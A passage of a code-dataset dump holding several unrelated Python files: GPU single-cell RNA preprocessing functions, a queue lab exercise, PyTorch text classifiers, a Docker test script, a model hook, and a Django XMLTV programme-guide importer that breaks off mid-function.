{"seq_id":"350947538","text":"#\n# Copyright (c) 2020, NVIDIA CORPORATION.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport cupy as cp\nimport cudf\n\nimport numpy as np\nimport scipy\nimport math\n\nfrom cuml.linear_model import LinearRegression\n\n\ndef scale(normalized, max_value=10):\n    \"\"\"\n    Scales matrix to unit variance and clips values\n\n    Parameters\n    ----------\n\n    normalized : cupy.ndarray or numpy.ndarray of shape (n_cells, n_genes)\n        Matrix to scale\n    max_value : int\n        After scaling matrix to unit variance,\n        values will be clipped to this number\n        of std deviations.\n\n    Return\n    ------\n\n    normalized : cupy.ndarray of shape (n_cells, n_genes)\n        Dense normalized matrix\n    \"\"\"\n\n    normalized = cp.asarray(normalized)\n    mean = normalized.mean(axis=0)\n    normalized -= mean\n    del mean\n    stddev = cp.sqrt(normalized.var(axis=0))\n    normalized /= stddev\n    del stddev\n    \n    return normalized.clip(a_max=max_value)\n\n\ndef _regress_out_chunk(X, y):\n    \"\"\"\n    Performs a data_chunk.shape[1] number of local linear regressions,\n    replacing the data in the original chunk w/ the regressed result.\n\n    Parameters\n    ----------\n\n    X : cupy.ndarray of shape (n_cells, 3)\n        Matrix of regressors\n\n    y : cupy.sparse.spmatrix of shape (n_cells,)\n        Sparse matrix containing a single column of the cellxgene matrix\n\n    Returns\n    -------\n\n    dense_mat : cupy.ndarray of shape (n_cells,)\n        Adjusted column\n    \"\"\"\n    y_d = y.todense()\n    \n    lr = LinearRegression(fit_intercept=False, output_type=\"cupy\")\n    lr.fit(X, y_d, convert_dtype=True)\n    return y_d.reshape(y_d.shape[0],) - lr.predict(X).reshape(y_d.shape[0])\n    \n\ndef normalize_total(csr_arr, target_sum):\n    \"\"\"\n    Normalizes rows in matrix so they sum to `target_sum`\n\n    Parameters\n    ----------\n\n    csr_arr : cupy.sparse.csr_matrix of shape (n_cells, n_genes)\n        Matrix to normalize\n\n    target_sum : int\n        Each row will be normalized to sum to this value\n\n    Returns\n    -------\n\n    csr_arr : cupy.sparse.csr_arr of shape (n_cells, n_genes)\n        Normalized sparse matrix\n    \"\"\"\n    \n    mul_kernel = cp.RawKernel(r'''\n    extern \"C\" __global__\n    void mul_kernel(const int *indptr, float *data, \n                    int nrows, int tsum) {\n        int row = blockDim.x * blockIdx.x + threadIdx.x;\n        \n        if(row >= nrows)\n            return;\n        \n        float scale = 0.0;\n        int start_idx = indptr[row];\n        int stop_idx = indptr[row+1];\n\n        for(int i = start_idx; i < stop_idx; i++)\n            scale += data[i];\n\n        if(scale > 0.0) {\n            scale = tsum / scale;\n            for(int i = start_idx; i < stop_idx; i++)\n                data[i] *= scale;\n        }\n    }\n    ''', 'mul_kernel')\n    \n    mul_kernel((math.ceil(csr_arr.shape[0] / 32.0),), (32,),\n               (csr_arr.indptr,\n                csr_arr.data,\n                
csr_arr.shape[0],\n int(target_sum)))\n \n return csr_arr\n\n\ndef regress_out(normalized, n_counts, percent_mito, verbose=False):\n\n \"\"\"\n Use linear regression to adjust for the effects of unwanted noise\n and variation.\n\n Parameters\n ----------\n\n normalized : cupy.sparse.csc_matrix of shape (n_cells, n_genes)\n The matrix to adjust. The adjustment will be performed over\n the columns.\n\n n_counts : cupy.ndarray of shape (n_cells,)\n Number of genes for each cell\n\n percent_mito : cupy.ndarray of shape (n_cells,)\n Percentage of genes that each cell needs to adjust for\n\n verbose : bool\n Print debugging information\n\n Returns\n -------\n\n outputs : cupy.ndarray\n Adjusted matrix\n \"\"\"\n\n regressors = cp.ones((n_counts.shape[0]*3)).reshape((n_counts.shape[0], 3), order=\"F\")\n\n regressors[:, 1] = n_counts\n regressors[:, 2] = percent_mito\n \n outputs = cp.empty(normalized.shape, dtype=normalized.dtype, order=\"F\")\n \n for i in range(normalized.shape[1]):\n if verbose and i % 500 == 0:\n print(\"Regressed %s out of %s\" %(i, normalized.shape[1]))\n X = regressors\n y = normalized[:,i]\n outputs[:, i] = _regress_out_chunk(X, y)\n \n return outputs\n\n\ndef filter_cells(sparse_gpu_array, min_genes, max_genes, rows_per_batch=10000, barcodes=None):\n \"\"\"\n Filter cells that have genes greater than a max number of genes or less than\n a minimum number of genes.\n\n Parameters\n ----------\n\n sparse_gpu_array : cupy.sparse.csr_matrix of shape (n_cells, n_genes)\n CSR matrix to filter\n\n min_genes : int\n Lower bound on number of genes to keep\n\n max_genes : int\n Upper bound on number of genes to keep\n\n rows_per_batch : int\n Batch size to use for filtering. This can be adjusted for performance\n to trade-off memory use.\n\n barcodes : series\n cudf series containing cell barcodes.\n\n Returns\n -------\n\n filtered : scipy.sparse.csr_matrix of shape (n_cells, n_genes)\n Matrix on host with filtered cells\n\n barcodes : If barcodes are provided, also returns a series of \n filtered barcodes.\n \"\"\"\n\n n_batches = math.ceil(sparse_gpu_array.shape[0] / rows_per_batch)\n filtered_list = []\n barcodes_batch = None\n for batch in range(n_batches):\n batch_size = rows_per_batch\n start_idx = batch * batch_size\n stop_idx = min(batch * batch_size + batch_size, sparse_gpu_array.shape[0])\n arr_batch = sparse_gpu_array[start_idx:stop_idx]\n if barcodes is not None:\n barcodes_batch = barcodes[start_idx:stop_idx]\n filtered_list.append(_filter_cells(arr_batch, \n min_genes=min_genes, \n max_genes=max_genes, \n barcodes=barcodes_batch))\n\n if barcodes is None:\n return scipy.sparse.vstack(filtered_list)\n else:\n filtered_data = [x[0] for x in filtered_list]\n filtered_barcodes = [x[1] for x in filtered_list]\n filtered_barcodes = cudf.concat(filtered_barcodes)\n return scipy.sparse.vstack(filtered_data), filtered_barcodes.reset_index(drop=True)\n\n\ndef _filter_cells(sparse_gpu_array, min_genes, max_genes, barcodes=None):\n degrees = cp.diff(sparse_gpu_array.indptr)\n query = ((min_genes <= degrees) & (degrees <= max_genes)).ravel()\n query = query.get()\n if barcodes is None:\n return sparse_gpu_array.get()[query]\n else:\n return sparse_gpu_array.get()[query], barcodes[query]\n\n\ndef filter_genes(sparse_gpu_array, genes_idx, min_cells=0):\n \"\"\"\n Filters out genes that contain less than a specified number of cells\n\n Parameters\n ----------\n\n sparse_gpu_array : scipy.sparse.csr_matrix of shape (n_cells, n_genes)\n CSR Matrix to filter\n\n genes_idx : 
cudf.Series or pandas.Series of size (n_genes,)\n Current index of genes. These must map to the indices in sparse_gpu_array\n\n min_cells : int\n Genes containing a number of cells below this value will be filtered\n \"\"\"\n thr = np.asarray(sparse_gpu_array.sum(axis=0) >= min_cells).ravel()\n filtered_genes = cp.sparse.csr_matrix(sparse_gpu_array[:, thr])\n genes_idx = genes_idx[np.where(thr)[0]]\n \n return filtered_genes, genes_idx.reset_index(drop=True)\n\n\ndef select_groups(labels, groups_order_subset='all'):\n adata_obs_key = labels\n groups_order = labels.cat.categories\n groups_masks = cp.zeros(\n (len(labels.cat.categories), len(labels.cat.codes)), dtype=bool\n )\n for iname, name in enumerate(labels.cat.categories):\n # if the name is not found, fallback to index retrieval\n if labels.cat.categories[iname] in labels.cat.codes:\n mask = labels.cat.categories[iname] == labels.cat.codes\n else:\n mask = iname == labels.cat.codes\n groups_masks[iname] = mask.values\n groups_ids = list(range(len(groups_order)))\n if groups_order_subset != 'all':\n groups_ids = []\n for name in groups_order_subset:\n groups_ids.append(\n cp.where(cp.array(labels.cat.categories.to_array().astype(\"int32\")) == int(name))[0][0]\n )\n if len(groups_ids) == 0:\n # fallback to index retrieval\n groups_ids = cp.where(\n cp.in1d(\n cp.arange(len(labels.cat.categories)).astype(str),\n cp.array(groups_order_subset),\n )\n )[0]\n \n groups_ids = [groups_id.item() for groups_id in groups_ids]\n groups_masks = groups_masks[groups_ids]\n groups_order_subset = labels.cat.categories[groups_ids].to_array().astype(int)\n else:\n groups_order_subset = groups_order.to_array()\n return groups_order_subset, groups_masks\n\n\ndef rank_genes_groups(\n X,\n labels, # louvain results\n var_names,\n groups=None,\n reference='rest',\n n_genes=100,\n **kwds,\n):\n\n \"\"\"\n Rank genes for characterizing groups.\n\n Parameters\n ----------\n\n X : cupy.ndarray of shape (n_cells, n_genes)\n The cellxgene matrix to rank genes\n\n labels : cudf.Series of size (n_cells,)\n Observations groupings to consider\n\n var_names : cudf.Series of size (n_genes,)\n Names of genes in X\n\n groups : Iterable[str] (default: 'all')\n Subset of groups, e.g. 
['g1', 'g2', 'g3'], to which comparison\n shall be restricted, or 'all' (default), for all groups.\n\n reference : str (default: 'rest')\n If 'rest', compare each group to the union of the rest of the group.\n If a group identifier, compare with respect to this group.\n\n n_genes : int (default: 100)\n The number of genes that appear in the returned tables.\n \"\"\"\n\n #### Wherever we see \"adata.obs[groupby], we should just replace w/ the groups\"\n\n import time\n \n start = time.time()\n \n # for clarity, rename variable\n if groups == 'all':\n groups_order = 'all'\n elif isinstance(groups, (str, int)):\n raise ValueError('Specify a sequence of groups')\n else:\n groups_order = list(groups)\n if isinstance(groups_order[0], int):\n groups_order = [str(n) for n in groups_order]\n if reference != 'rest' and reference not in set(groups_order):\n groups_order += [reference]\n if (\n reference != 'rest'\n and reference not in set(labels.cat.categories)\n ):\n cats = labels.cat.categories.tolist()\n raise ValueError(\n f'reference = {reference} needs to be one of groupby = {cats}.'\n )\n\n groups_order, groups_masks = select_groups(labels, groups_order)\n \n original_reference = reference\n \n n_vars = len(var_names)\n\n # for clarity, rename variable\n n_genes_user = n_genes\n # make sure indices are not OoB in case there are less genes than n_genes\n if n_genes_user > X.shape[1]:\n n_genes_user = X.shape[1]\n # in the following, n_genes is simply another name for the total number of genes\n n_genes = X.shape[1]\n\n n_groups = groups_masks.shape[0]\n ns = cp.zeros(n_groups, dtype=int)\n for imask, mask in enumerate(groups_masks):\n ns[imask] = cp.where(mask)[0].size\n if reference != 'rest':\n ireference = cp.where(groups_order == reference)[0][0]\n reference_indices = cp.arange(n_vars, dtype=int)\n\n rankings_gene_scores = []\n rankings_gene_names = []\n\n # Perform LogReg\n \n # if reference is not set, then the groups listed will be compared to the rest\n # if reference is set, then the groups listed will be compared only to the other groups listed\n from cuml.linear_model import LogisticRegression\n reference = groups_order[0]\n if len(groups) == 1:\n raise Exception('Cannot perform logistic regression on a single cluster.')\n grouping_mask = labels.astype('int').isin(cudf.Series(groups_order))\n grouping = labels.loc[grouping_mask]\n \n X = X[grouping_mask.values, :] # Indexing with a series causes issues, possibly segfault\n y = labels.loc[grouping]\n \n clf = LogisticRegression(**kwds)\n clf.fit(X.get(), grouping.to_array().astype('float32'))\n scores_all = cp.array(clf.coef_).T\n \n for igroup, group in enumerate(groups_order):\n if len(groups_order) <= 2: # binary logistic regression\n scores = scores_all[0]\n else:\n scores = scores_all[igroup]\n\n partition = cp.argpartition(scores, -n_genes_user)[-n_genes_user:]\n partial_indices = cp.argsort(scores[partition])[::-1]\n global_indices = reference_indices[partition][partial_indices]\n rankings_gene_scores.append(scores[global_indices].get()) ## Shouldn't need to take this off device\n rankings_gene_names.append(var_names[global_indices].to_pandas())\n if len(groups_order) <= 2:\n break\n\n groups_order_save = [str(g) for g in groups_order]\n if (len(groups) == 2):\n groups_order_save = [g for g in groups_order if g != reference]\n \n print(\"Ranking took (GPU): \" + str(time.time() - start))\n \n start = time.time()\n \n scores = np.rec.fromarrays(\n [n for n in rankings_gene_scores],\n dtype=[(rn, 'float32') for rn in 
groups_order_save],\n    )\n    \n    names = np.rec.fromarrays(\n        [n for n in rankings_gene_names],\n        dtype=[(rn, 'U50') for rn in groups_order_save],\n    )\n    \n    print(\"Preparing output np.rec.fromarrays took (CPU): \" + str(time.time() - start))\n    print(\"Note: This operation will be accelerated in a future version\")\n    \n    return scores, names, original_reference\n","sub_path":"notebooks/rapids_scanpy_funcs.py","file_name":"rapids_scanpy_funcs.py","file_ext":"py","file_size_in_byte":14217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"224647092","text":"#-------------------------------------------------------------------------------\n# Name: Lab 5 Exercise4\n# Purpose:\n#\n# Author: Zhao\n#\n# Created: 06/02/2016\n# Copyright: (c) Zhao 2016\n# Licence: \n#-------------------------------------------------------------------------------\nimport bounded_queue\ndef main():\n    queue = bounded_queue.BoundedQueue(3)\n    request = ''\n    while request != 'exit':\n        request = input('Add, Serve or Exit: ').lower()\n        if request not in ('add', 'serve', 'exit'):\n            print('You need to enter either Add, Serve or Exit')\n            continue\n        elif request == 'exit':\n            print('Quitting,')\n            print('Line:',queue)\n            break\n        elif request == 'add':\n            try:\n                name = input('Enter the name of the person to add: ')\n                print('add ',name,' to the line.')\n                queue.enqueue(name)\n            except:\n                print('Error: Queue is full')\n                continue\n            finally:\n                print('people in the line:',queue)\n        elif request == 'serve':\n            try:\n                queue.dequeue()\n            except:\n                print('Error: Queue is empty')\n            finally:\n                print('people in the line:',queue)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Lab5/Exercise4.py","file_name":"Exercise4.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"27203960","text":"import torch\nimport torch.nn as nn\n\nfrom transfer.module.conv import ResBlock\n\n\nclass CNNClassifier(nn.Module):\n    def __init__(self, vocab_size, embedding_dim, max_length):\n        super(CNNClassifier, self).__init__()\n        self.embedding = nn.Embedding(vocab_size, embedding_dim)\n        self.block = nn.Sequential(\n            ResBlock(embedding_dim),\n            ResBlock(embedding_dim),\n            ResBlock(embedding_dim),\n            ResBlock(embedding_dim),\n            ResBlock(embedding_dim),\n        )\n        self.maxpool = nn.MaxPool1d(max_length)\n        self.linear = nn.Linear(embedding_dim, 1)\n        self.sigmoid = nn.Sigmoid()\n\n    def forward(self, inputs, is_discrete=False):\n        \"\"\"\n        inputs: float tensor, shape = [B, T, vocab_size]\n        \"\"\"\n        if is_discrete:\n            inputs = self.embedding(inputs)\n        else:\n            batch_size, length, vocab_size = inputs.size()\n            inputs = inputs.contiguous().view(-1, vocab_size)\n            inputs = torch.mm(inputs, self.embedding.weight)\n            inputs = inputs.view(batch_size, length, -1)\n        inputs = inputs.transpose(1, 2)  # (B, H, T)\n        outputs = self.block(inputs)  # (B, H, T)\n        outputs = self.maxpool(outputs)  # (B, H, 1)\n        outputs = outputs.squeeze(-1)  # (B, H)\n        outputs = self.linear(outputs)  # (B, 1)\n        outputs = self.sigmoid(outputs)\n        return outputs\n\n\nclass RNNClassifier(nn.Module):\n    def __init__(self, embedding, hidden_size, dropout=0.1, num_layers=1,\n                 bidirectional=True, cell=nn.GRU):\n        super(RNNClassifier, self).__init__()\n        if bidirectional:\n            self.num_directions = 2\n        else:\n            self.num_directions = 1\n        self.embedding = embedding\n        self.hidden_size = hidden_size\n        self.num_layers = num_layers\n        self.rnn = cell(\n            embedding.embedding_dim, hidden_size,\n            dropout=(0 if num_layers == 1 
else dropout),\n num_layers=num_layers,\n batch_first=True,\n bidirectional=bidirectional)\n self.linear = nn.Linear(hidden_size * self.num_directions, 1)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, inputs, is_discrete=False):\n \"\"\"\n Args:\n inputs: float tensor, shape = [B x T x vocab_size], probility\n is_discrete: boolean, if True, the inputs shape is [B x T]\n\n Returns:\n loss: float tensor, scalar, binomial probility\n \"\"\"\n if is_discrete:\n inputs = self.embedding(inputs)\n else:\n batch_size, length, vocab_size = inputs.size()\n inputs = inputs.contiguous().view(-1, vocab_size)\n inputs = torch.mm(inputs, self.embedding.weight)\n inputs = inputs.view(batch_size, length, -1)\n _, hidden = self.rnn(inputs)\n if type(hidden) is tuple:\n hidden = hidden[0]\n hidden = hidden.view(\n self.num_layers, self.num_directions, -1, self.hidden_size)\n if self.num_directions == 2:\n outputs = torch.cat(\n [hidden[-1, 0, :, :], hidden[-1, 1, :, :]], dim=-1)\n else:\n outputs = hidden[-1, -1, :, :]\n outputs = self.linear(outputs)\n outputs = self.sigmoid(outputs)\n return outputs\n\n\nclass CNNCritic(nn.Module):\n def __init__(self, embedding, max_length):\n super(CNNCritic, self).__init__()\n self.embedding = embedding\n self.block = nn.Sequential(\n ResBlock(embedding.embedding_dim),\n ResBlock(embedding.embedding_dim),\n ResBlock(embedding.embedding_dim),\n ResBlock(embedding.embedding_dim),\n ResBlock(embedding.embedding_dim),\n )\n self.maxpool = nn.MaxPool1d(max_length)\n self.linear = nn.Linear(embedding.embedding_dim, 1)\n\n def forward(self, inputs, is_discrete=False):\n \"\"\"\n inputs: float tensor, shape = [B, T, vocab_size]\n \"\"\"\n if is_discrete:\n inputs = self.embedding(inputs)\n else:\n batch_size, length, vocab_size = inputs.size()\n inputs = inputs.contiguous().view(-1, vocab_size)\n inputs = torch.mm(inputs, self.embedding.weight)\n inputs = inputs.view(batch_size, length, -1)\n inputs = inputs.transpose(1, 2) # (B, H, T)\n outputs = self.block(inputs) # (B, H, T)\n outputs = self.maxpool(outputs) # (B, H, 1)\n outputs = outputs.squeeze(-1) # (B, H)\n outputs = self.linear(outputs) # (B, 1)\n return outputs\n","sub_path":"transfer/module/discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"420289081","text":"import sys\nimport os\nimport time\n\n\ndef main():\n env = os.environ\n print(env)\n SLEEP = int(env.get(\"SLEEP\") or 10)\n EXIT_CODE = int(env.get(\"EXIT_CODE\") or 0)\n ARGS = env.get(\"ARGS\") or \"\"\n if ARGS == \"\":\n print(\"$ARGS was not specified as an environment variable.\")\n else:\n print(\"$ARGS are \" + ARGS)\n time.sleep(SLEEP)\n sys.exit(EXIT_CODE)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"code/python/docker/testimage/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"39136813","text":"\"\"\"A hook for modifying parameter values read from the WMT client.\"\"\"\n\nfrom wmt.utils.hook import yaml_dump\nfrom topoflow_utils.hook import assign_parameters\n\n\nfile_list = []\n\n\ndef execute(env):\n \"\"\"Perform pre-stage tasks for running a component.\n\n Parameters\n ----------\n env : dict\n A dict of component parameter values from WMT.\n\n \"\"\"\n env['model_end_year'] = long(env['model_start_year']) \\\n + long(env['_run_duration'])\n\n 
assign_parameters(env, file_list)\n\n env['_file_list'] = file_list\n yaml_dump('_env.yaml', env)\n","sub_path":"metadata/CMIP/hooks/pre-stage.py","file_name":"pre-stage.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"52049600","text":"#!/usr/bin/env python\n# -*- encoding:utf-8 -*-\n\nfrom django.conf import settings\nfrom django import db\nfrom django.db import transaction\nfrom django.core import serializers\nfrom django.utils.timezone import utc\n\nimport re\nimport zipfile\nimport tempfile\nimport shutil\nfrom lxml import etree\n#from datetime import tzinfo, datetime\nfrom datetime import timedelta, datetime\nfrom dateutil.parser import parse\nfrom pytz import timezone\nfrom types import NoneType\n\nfrom models import *\n\nimport hotshot\nimport time\nimport logging\n\nPROFILE_LOG_BASE = \"/tmp\"\n\n\ndef profile(log_file):\n \"\"\"Profile some callable.\n\n This decorator uses the hotshot profiler to profile some callable (like\n a view function or method) and dumps the profile data somewhere sensible\n for later processing and examination.\n\n It takes one argument, the profile log name. If it's a relative path, it\n places it under the PROFILE_LOG_BASE. It also inserts a time stamp into the\n file name, such that 'my_view.prof' become 'my_view-20100211T170321.prof',\n where the time stamp is in UTC. This makes it easy to run and compare\n multiple trials.\n \"\"\"\n\n if not os.path.isabs(log_file):\n log_file = os.path.join(PROFILE_LOG_BASE, log_file)\n\n def _outer(f):\n def _inner(*args, **kwargs):\n # Add a timestamp to the profile output when the callable\n # is actually called.\n (base, ext) = os.path.splitext(log_file)\n base = base + \"-\" + time.strftime(\"%Y%m%dT%H%M%S\", time.gmtime())\n final_log_file = base + ext\n\n prof = hotshot.Profile(final_log_file)\n try:\n ret = prof.runcall(f, *args, **kwargs)\n finally:\n prof.close()\n return ret\n\n return _inner\n return _outer\n\n\nclass Zip_to_XML(object):\n '''\n This class is used to pre-treat an input file\n that can be a XML, a ZIP with one XML file inside or\n a ZIP file with multiple XML files inside\n '''\n\n def __init__(self, input_file_path):\n import mimetypes\n file_type, encoding = mimetypes.guess_type(input_file_path)\n if file_type == 'application/zip':\n self.input_file = zipfile.ZipFile(input_file_path, 'r')\n self.get_all_files = self._get_zip\n elif file_type in ('application/xhtml+xml', 'text/xml'):\n self.input_file = input_file_path\n self.get_all_files = self._get_xml\n else:\n raise Exception('Unkown type of file to import:', file_type)\n\n # Return one or multiple XML file handles inside a Zip archive\n def _get_zip(self):\n ret = []\n for f in self.input_file.namelist():\n filename = os.path.basename(f)\n\n # skip directories\n if not filename:\n continue\n\n # copy file (taken from zipfile's extract)\n source = self.input_file.open(f)\n target = file(os.path.join('/tmp', filename), \"w+\")\n shutil.copyfileobj(source, target)\n source.close()\n target.seek(0)\n\n ret.append(target)\n return ret\n\n # Return a file handle of a XML file\n def _get_xml(self):\n return (open(self.input_file),)\n\n\nclass XML_Epg_Importer(object):\n '''\n Used to import XMLTV compliant files to the database.\n It receives a XML file handle as input.\n Imports xml into xmltv_source object\n '''\n\n def __init__(self, xml, xmltv_source=None, epg_source=None,\n log=open('/dev/null', 'w')):\n log = 
logging.getLogger('epg_import')\n self.xmltv_source = xmltv_source\n self.epg_source = epg_source\n self.xml = xml\n self.log = log\n\n self.tree = etree.parse(self.xml.name)\n # get number of elements\n self.total_channel = self.tree.xpath(\"count(//channel)\")\n self.total_programme = self.tree.xpath(\"count(//programme)\")\n log.info('channel=%d , programme=%d', self.total_channel,\n self.total_programme)\n self.epg_source.numberofElements += \\\n self.total_channel +\\\n self.total_programme\n # get meta data\n self.xmltv_source.generator_info_name = \\\n self.tree.xpath('string(//tv[1]/@generator-info-name)')\n self.xmltv_source.generator_info_url = \\\n self.tree.xpath('string(//tv[1]/@generator-info-url)')\n # save\n self.xmltv_source.save()\n\n def serialize(self, obj):\n # use recursion to iterate\n try:\n [self.serialize(o) for o in obj]\n except TypeError:\n pass\n\n name = obj.__class__.__name__\n # check if there is an opened file descriptor for this kind of obj\n if not name in self.dump_data['file_handlers']:\n self.dump_data['file_handlers'][name] = open(\n '%s/%s.json' % (self.tempdir, name), 'w')\n self.dump_data['object_ids'][name] = []\n if self.already_serialized(obj):\n # already serialized, so skip it\n return\n\n self.dump_data['object_ids'][name].append(obj.id)\n data = serializers.serialize(\"json\", [obj, ], indent=2)\n self.dump_data['file_handlers'][name].write(data)\n\n def already_serialized(self, obj):\n name = obj.__class__.__name__\n try:\n self.dump_data['object_ids'][name].index(obj.id)\n # already serialized\n return 1\n except KeyError:\n return 0\n except ValueError:\n return 0\n\n def count_channel_elements(self):\n return len(self.tree.findall('channel'))\n\n def count_programme_elements(self):\n return len(self.tree.findall('programme'))\n\n def get_number_of_elements(self):\n return self.count_channel_elements() + self.count_programme_elements()\n\n def get_period_of_the_file(self):\n programmes = self.tree.findall('programme')\n starts = map(lambda p: parse(p.get('start')), programmes)\n stops = map(lambda p: parse(p.get('stop')), programmes)\n starts.sort()\n s_start = starts[0]\n stops.sort(reverse=True)\n s_stop = stops[0]\n return s_start.astimezone(timezone('UTC')).replace(tzinfo=utc), \\\n s_stop.astimezone(timezone('UTC')).replace(tzinfo=utc)\n\n def get_xml_info(self):\n tv = self.tree.getroot()\n return {\n 'source_info_url': tv.get('source-info-url'), \\\n 'source_info_name': tv.get('source-info-name'), \\\n 'source_data_url': tv.get('source-data-url'), \\\n 'generator_info_name': tv.get('generator-info-name'), \\\n 'generator_info_url': tv.get('generator-info-url')\n }\n\n #@transaction.commit_on_success\n def _increment_importedElements(self):\n if isinstance(self.epg_source, Epg_Source):\n self.epg_source.importedElements += 1\n self.epg_source.save()\n\n #@transaction.commit_on_success\n def _decrement_importedElements(self):\n if isinstance(self.epg_source, Epg_Source) \\\n and self.epg_source.importedElements > 0:\n self.epg_source.importedElements -= 1\n self.epg_source.save()\n\n def _get_dict_for_langs(self):\n # Search for lang attributes in the xml\n lang_set = set()\n for l in self.tree.findall(\".//*[@lang]\"):\n lang_set.add(l.get('lang')) # Auto exclude dupplicates\n langs = dict()\n for lang in lang_set:\n L, created = Lang.objects.get_or_create(value=lang)\n langs[lang] = L.id\n return langs\n\n def grab_info(self):\n log = logging.getLogger('epg_import')\n log.info('Grabbing meta information')\n\n self.xml.seek(0)\n 
for event, elem in etree.iterparse(self.xml, tag='tv'):\n self.xmltv_source.generator_info_name = \\\n elem.get('generator-info-name')\n self.xmltv_source.generator_info_url = \\\n elem.get('generator-info-url')\n\n self.xmltv_source.save()\n\n #@transaction.commit_on_success\n def import_channel_elements(self):\n log = logging.getLogger('epg_import')\n log.info('Importing Channel elements')\n self.xml.seek(0)\n #for ev, elem in etree.iterparse(self.xml.name, tag='channel'):\n for elem in self.tree.xpath('channel'):\n\n C, created = Channel.objects.get_or_create(\n channelid=elem.get('id'))\n\n for child in elem.iterchildren():\n if child.tag == 'display-name':\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n D, created = Display_Name.objects.get_or_create(\n value=child.text or '', lang=L)\n C.display_names.add(D)\n self.serialize(D)\n elif child.tag == 'icon':\n I, created = Icon.objects.get_or_create(\n src=child.get('src'))\n C.icons.add(I)\n self.serialize(I)\n elif child.tag == 'url':\n U, created = Url.objects.get_or_create(value=child.text)\n C.urls.add(U)\n self.serialize(U)\n\n #self.serialize(C)\n\n elem.clear()\n # Also eliminate now-empty references from the root node to \n while elem.getprevious() is not None:\n del elem.getparent()[0]\n\n #@profile(\"programme.prof\")\n @transaction.commit_manually\n def import_programme_elements(self, limit=0):\n log = logging.getLogger('epg_import')\n log.debug('Importing Programme elements:%s', self.xml.name)\n # Get channels from db\n channels = dict()\n for c in Channel.objects.values_list('channelid', 'pk'):\n channels[c[0]] = c[1]\n import_start = datetime.now()\n import_ant = datetime.now()\n nant = 0\n imported = 0\n\n self.xml.seek(0)\n try:\n #for event, elem in etree.iterparse(self.xml, tag='programme'):\n for elem in self.tree.xpath('programme'):\n if elem.find('date') is not None:\n date = elem.find('date').text\n else:\n date = None\n\n programid = elem.get('program_id')\n #log.info('program_id=%s', programid)\n P, c = Programme.objects.get_or_create(programid=programid)\n P.date = date\n P.save()\n # log.info('finish=%s', programid)\n\n # Get time and convert it to UTC\n start = parse(elem.get('start')).astimezone(\n timezone('UTC')).replace(tzinfo=utc)\n stop = parse(elem.get('stop')).astimezone(\n timezone('UTC')).replace(tzinfo=utc)\n # Insert guide\n channel_id = channels[elem.get('channel')]\n G, created = Guide.objects.get_or_create(\n start=start, stop=stop,\n channel_id=channel_id, programme=P)\n for child in elem.iterchildren():\n if child.tag == 'desc':\n if child.get('lang'):\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n else:\n L = None\n if type(child.text) is NoneType:\n continue\n desc = child.text.replace(\n ' - www.revistaeletronica.com.br ', '')\n obj, created = Description.objects.get_or_create(\n value=desc, lang=L)\n P.descriptions.add(obj)\n elif child.tag == 'title':\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n obj, created = Title.objects.get_or_create(\n value=child.text, lang=L)\n P.titles.add(obj)\n elif child.tag == 'sub-title':\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n obj, created = Title.objects.get_or_create(\n value=child.text, lang=L)\n P.secondary_titles.add(obj)\n elif child.tag == 'category':\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n obj, created = Category.objects.get_or_create(\n value=child.text, lang=L)\n P.categories.add(obj)\n elif child.tag == 
'video':\n for grand_child in child.iterchildren():\n if grand_child.tag == 'colour':\n P.video_colour = grand_child.text\n elif grand_child.tag == 'present':\n P.video_present = grand_child.text\n elif grand_child.tag == 'aspect':\n P.video_aspect = grand_child.text\n elif grand_child.tag == 'quality':\n P.video_quality = grand_child.text\n elif child.tag == 'audio':\n for grand_child in child.iterchildren():\n if grand_child.tag == 'present':\n P.audio_present = grand_child.text\n elif grand_child.tag == 'stereo':\n P.audio_stereo = grand_child.text\n elif child.tag == 'country':\n obj, created = Country.objects.get_or_create(\n value=child.text)\n P.country = obj\n elif child.tag == 'rating':\n sys='default'\n val='default'\n if child.get('system') != None:\n sys = child.get('system')\n if child.find('value').text != None:\n val = child.find('value').text\n obj, created = Rating.objects.get_or_create(\n system=sys,\n value=val)\n P.rating = obj\n elif child.tag == 'star-rating':\n obj, created = Star_Rating.objects.get_or_create(\n value=child.find('value').text,\n system=child.get('system'))\n for i in child.iterfind('icon'):\n I, created = Icon.objects.get_or_create(\n src=i.get('src'))\n obj.icons.add(I)\n P.star_ratings.add(obj)\n elif child.tag == 'language':\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n obj, created = Language.objects.get_or_create(\n value=child.text, lang=L)\n P.language = obj\n elif child.tag == 'original_language':\n L, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n obj, created = Language.objects.get_or_create(\n value=child.text, lang=L)\n P.original_language = obj\n elif child.tag == 'subtitles':\n obj = set()\n for sub in child.iterchildren('language'):\n lang, created = Lang.objects.get_or_create(\n value=child.get('lang'))\n L, created = Language.objects.get_or_create(\n value=sub.text, lang=lang)\n S, created = Subtitle.objects.get_or_create(\n language=L, subtitle_type=sub.get('type'))\n P.subtitles.add(S)\n obj.add((L, S))\n elif child.tag == 